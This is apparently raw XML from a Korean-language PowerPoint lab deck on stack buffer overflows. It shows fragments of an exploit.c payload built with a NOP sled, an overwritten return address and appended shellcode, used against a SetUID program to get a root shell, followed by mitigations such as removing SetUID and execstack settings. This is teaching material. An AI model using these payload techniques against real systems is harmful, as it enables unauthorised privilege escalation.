              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4013069219"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6319647" y="2189525"/>
          <a:ext cx="4532687" cy="4202566"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4532687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3992703851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23356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05935082"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3959219">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bof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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>buffer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(24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복귀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348403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47105" name="_x564888896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB31F6E-30A6-4412-BD4E-A74C36C72C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948" y="2778157"/>
            <a:ext cx="3559973" cy="3130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8688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 exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</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err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>빌드</a:t>
            </a:r>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exploit exploit</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a:t>/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 제작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>28</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68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E56183-D24B-467D-8876-01211AFE7DD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="478" b="1886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520699" y="866624"/>
            <a:ext cx="4901983" cy="2702076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CF1106-5283-424F-AF5B-97A01DDAC91D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="957" t="4646" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="4311650"/>
            <a:ext cx="4925568" cy="511889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24B75ED-6B35-4C94-AB13-3FC6A450DCE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1068" t="-277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="5334930"/>
            <a:ext cx="4929506" cy="706161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418F384F-0013-4CBA-BB0F-60762091DAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172084023"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6265233" y="493694"/>
          <a:ext cx="5475010" cy="4580825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2486881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2988129">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="574915489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="212013">
                <a:tc gridSpan="2">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tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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43398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먼저 페이로드를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NOP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채운다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kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>memset (&amp; buffer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>, 0x90, 517); // </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a: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a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 28</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>에 복귀 주소가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복귀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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즉</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>다음과 같은 페이로드가 준비된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>.</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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> ((long *)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(long)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+ 4);</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dirty="0">
                        <a:effectLst/>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0631132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="_x564938936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88597877-B49A-47BC-BAEF-49FD67383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7029" y="1876626"/>
            <a:ext cx="2298877" cy="3104744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49154" name="_x564941312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAC8B12-17AD-4D77-8624-505DB03028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8636" y="1876626"/>
            <a:ext cx="2298877" cy="310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282406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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 루트 쉘 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="표 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049CFF3B-8277-4780-B382-55D6783068EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1670393565"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="552010" y="531791"/>
          <a:ext cx="5029640" cy="4023880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5029640">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="26780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3756073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>마지막으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>쉘코드를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 페이로드 마지막 부분에 복사해 넣는다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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memcpy (buffer + sizeof (buffer</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- sizeof (shellcode), shellcode, sizeof (shellcode))</a:t>
                      </a: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8025249"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="_x564957368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507E7344-3FC1-430B-AB6B-CAD87F5EA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895" y="1396921"/>
            <a:ext cx="2277247" cy="30742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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE841136-D24E-4F8C-98EB-335D1FE02A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1165" t="2082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="5137297"/>
            <a:ext cx="4903081" cy="590565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFAC1FD6-2A5F-46CF-AE10-D0CB522CC28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쉘을 획득한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>상태에서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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255003695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C6642C97-AE41-486C-BE08-8D12FAF981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통해 쉘 코드가 실행되지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값</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: execstack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139A787F-55D9-4280-A8E7-48BDE3B120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C3DFF4-2FD7-4BB3-B403-C968BA8BCA13}"/>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쉘코드를</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endParaRPr lang="ko-KR" altLang="en-US" sz="950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="타원 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D80CE4A-C2E9-4560-8E50-EB848B2EAE7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C3017B1-DBDF-418B-BC4C-BD9FA0CFACF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F0DE2446-C02B-47FA-9538-513B519A14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A4D0FFD-0653-4F8F-8056-CFE9FBC86D85}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164214617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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제</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dirty="0"/>
              <a:t># ls –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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스택 실행 방지 설정 및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–c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a:t># execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7DBDD6-CBB4-41A5-9432-8FEB5F7C7146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="488950" y="833966"/>
            <a:ext cx="4727194" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661EAAE-E448-42C9-A743-DC8DACC6B013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="5111" r="2302" b="19042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="2149362"/>
            <a:ext cx="4958142" cy="641521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA759F0-00FE-4ADB-B599-D6E8C0B1728C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="576462405"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483152" y="2880142"/>
          <a:ext cx="4932807" cy="2443353"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1163277480"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23408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63118803"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2012252">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해제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실행되기는 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 그림의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>경우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권한을 가지는 쉘이 나타난다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816622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53249" name="_x1658446056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A57FB5-7F34-409E-850A-FA077295B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19" y="3671797"/>
            <a:ext cx="4779963"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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6A4311-731E-4CA8-BFC4-6D2BBC40CF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="5773673"/>
            <a:ext cx="4983480" cy="556260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E78BD65-C113-4787-9C38-CB1A8A9FEA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
